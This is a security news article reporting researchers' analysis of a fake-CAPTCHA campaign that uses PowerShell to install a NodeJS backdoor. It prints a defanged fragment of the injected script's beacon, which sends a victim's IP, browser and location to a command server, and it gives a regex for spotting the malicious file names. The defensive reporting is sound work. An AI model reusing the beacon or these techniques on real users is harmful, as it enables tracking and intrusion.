A sophisticated malware campaign has emerged that deploys stealthy NodeJS backdoors through deceptive CAPTCHA verification screens, security researchers revealed today.

This campaign represents a growing trend of threat actors exploiting seemingly legitimate security measures to distribute malicious code, targeting users who are accustomed to completing CAPTCHA challenges during their regular online activities.

The attack begins when users visit compromised websites, often accessed through social media links or search results.

These sites contain injected malicious code that loads JavaScript files, eventually leading victims to fake CAPTCHA verification pages.

When users attempt to complete these CAPTCHA challenges, malicious PowerShell commands are covertly executed in the background, installing a NodeJS-based backdoor that provides attackers with persistent access to the victim’s system.

Trustwave SpiderLabs researchers identified this threat during an Advanced Continual Threat Hunt conducted in early March 2025.

Their analysis revealed that this malware campaign is part of the broader KongTuke activity cluster, which has been active since September 2024.

The campaign has shown a notable level of sophistication, with attackers continuously updating their tactics to evade detection.

“Given the effectiveness and high success rates of fake CAPTCHA techniques as an initial access vector compared to traditional methods, we anticipate continued growth and prevalence of these tactics,” noted the Trustwave report.

The researchers also observed a resurgence in similar NodeJS-based backdoor deployments across multiple malware campaigns, including KongTuke, Fake CAPTCHA schemes, Mispadu, and Lumma stealers.

The backdoor, dubbed YaNB (Yet Another NodeJS Backdoor), demonstrates advanced capabilities including system reconnaissance, command execution, and data exfiltration.

Once installed, it establishes a connection to attacker-controlled infrastructure and remains in a passive state awaiting further commands, which facilitates the deployment of additional malicious components.

Infection Mechanism: From Compromised Sites to Node.js RAT

The infection chain begins with compromised websites containing injected JavaScript code.

These scripts follow a specific naming pattern identified by researchers: a four-character sequence with alternating numbers and lowercase letters (“1q2w.js”), matching the regular expression pattern “\d[a-z]\d[a-z].js”.

When users visit these compromised sites, the injected script performs initial reconnaissance by collecting system information including operating system details, IP address, browser type, and geolocation data.

This information is then encoded and sent to the command and control server:-

"hxxps://[.]com/js.php?"
"device=" + os +
"&ip=" + btoa(ipData.ip) +
"&referrer=" + btoa(url) +
"&browser=" + btoa(browser) +
"&ua=" + btoa(userAgent) +
"&domain=" + btoa("hxxps://[.]com") +
"&loc=" + btoa(ipData.loc) +
"&is_ajax=1"

Following this initial reconnaissance, the C2 server responds with the fake CAPTCHA challenge code.

The user, believing they are completing a legitimate security verification, triggers a PowerShell command that downloads and installs Node.js and executes the backdoor.

This backdoor employs sophisticated anti-VM techniques to evade analysis, checking for system characteristics that might indicate a virtual environment, such as memory size and computer name patterns.

The NodeJS backdoor uses a custom XOR-based encryption mechanism for command and control communications and establishes persistence through registry modifications, disguising itself as a legitimate browser update service.

Once fully operational, the malware can deploy additional payloads, including more advanced NodeJS RATs capable of tunneling malicious traffic through SOCKS5 proxies.

As this campaign continues to evolve, organizations and users should remain vigilant when encountering CAPTCHA challenges, particularly on less familiar websites.

Are you from the SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.